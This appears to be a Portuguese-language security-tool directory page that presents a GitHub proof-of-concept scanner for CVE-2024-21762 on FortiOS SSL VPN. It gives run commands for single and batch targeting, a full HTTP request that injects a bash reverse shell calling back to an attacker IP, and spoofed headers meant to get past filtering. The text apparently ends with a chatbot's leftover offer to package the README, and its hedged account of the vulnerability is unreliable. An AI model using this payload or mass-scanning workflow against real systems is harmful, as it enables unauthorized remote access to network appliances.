Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-21762_FortiNet_PoC — Scanner de prova de conceito visando CVE-2024-21762 no endpoint /remote/hostcheck_validate do FortiOS SSL VPN com entrega de payload de reverse shell. | Kitploit
Ferramentas/GitHubGitHub/abrewer251/cve-2024-21762_fortinet_poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubabrewer251/cve-2024-21762_fortinet_poc

CVE-2024-21762_FortiNet_PoC

Scanner de prova de conceito visando CVE-2024-21762 no endpoint /remote/hostcheck_validate do FortiOS SSL VPN com entrega de payload de reverse shell.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
212há 1 anoAinda não revisado
Compartilhar

CVE-2024-21762_FortiNet_PoC

Scanner de prova de conceito visando o CVE-2024-21762 no endpoint /remote/hostcheck_validate do SSL VPN do FortiOS com entrega de payload de shell reverso.

Aqui está uma descrição no estilo GitHub para o seu projeto, incluindo um resumo limpo e conciso, um guia de uso e contexto sobre como ele se encaixa no CVE.


🔥 Título do Projeto: CVE-2024-21762 FortiOS HostCheck PoC Scanner

🧠 Resumo (para a linha de descrição do GitHub):

Scanner de prova de conceito visando o CVE-2024-21762 no endpoint /remote/hostcheck_validate do SSL VPN do FortiOS com entrega de payload de shell reverso.


📜 Visão Geral

Este script Python é uma ferramenta de PoC (Prova de Conceito) projetada para interagir com a interface SSL VPN do FortiOS da Fortinet, visando a — uma vulnerabilidade de estouro de buffer baseado em pilha ou injeção de comandos no endpoint .

CVE-2024-21762
/remote/hostcheck_validate

Aviso: Isso é apenas para fins educacionais e testes autorizados.


🧬 Como Funciona

  • Envia uma requisição POST personalizada para /remote/hostcheck_validate em uma interface SSL VPN do FortiGate.
  • Injeta um payload de shell reverso bash em um parâmetro simulado vulnerável (host).
  • Usa cabeçalhos falsificados (User-Agent, Cookie) para burlar a filtragem superficial de requisições do FortiOS.
  • Recebe e registra as respostas do servidor para avaliar o sucesso da exploração.
  • Suporta teste em alvo único ou em lote com arquivos de entrada/saída e barras de progresso.

🛠️ Funcionalidades

  • 🧪 Injeção de payload de shell reverso via campo de formulário controlado
  • 🧾 Captura completa da resposta HTTP para análise (last_response.txt)
  • 📊 Barra de progresso para acompanhamento em modo único ou em lote
  • 🗃️ Modo em lote com suporte a arquivos de entrada/saída
  • 🔄 Modular e extensível

⚙️ Requisitos

  • Python 3.6+
  • tqdm para visualização de progresso

Instale as dependências:

root@kitploit:~
pip install tqdm

🚀 Uso

Modo Alvo Único

root@kitploit:~
python3 exploit.py --target 192.168.1.1:443 --callback-ip SEU_IP --callback-port 8080

Modo em Lote

root@kitploit:~
python3 exploit.py --input targets.txt --output results.txt --callback-ip SEU_IP --callback-port 8080
  • targets.txt: Lista de alvos no formato IP:PORT, um por linha
  • results.txt: Log de saída das tentativas de exploração

📥 Exemplo de Payload Enviado

root@kitploit:~
POST /remote/hostcheck_validate HTTP/1.1
Host: [target]
User-Agent: FortiSSLVPNClient/6.4.0
Cookie: SVPNCOOKIE=AAAA
Content-Type: application/x-www-form-urlencoded

host=bash -c 'bash -i >& /dev/tcp/[callback-ip]/[callback-port] 0>&1'&...

🔍 Logs

A ferramenta escreve a resposta HTTP completa de cada tentativa em:

root@kitploit:~
last_response.txt

Use isso para verificar se a requisição foi analisada, rejeitada ou se um código de erro foi retornado.


⚠️ Legal

Este código é fornecido apenas para fins educacionais e testes autorizados. Não utilize em redes ou sistemas que você não possui ou para os quais não tem permissão explícita para testar.


✍️ Autor

Carter — Engenheiro de Cibersegurança, entusiasta de Red/Purple Team, nerd em automação de PoCs.


Gostaria que isso fosse empacotado em um arquivo README.md + estrutura de repositório pronta para enviar ao GitHub? Posso gerar isso em seguida.

Baixar ferramenta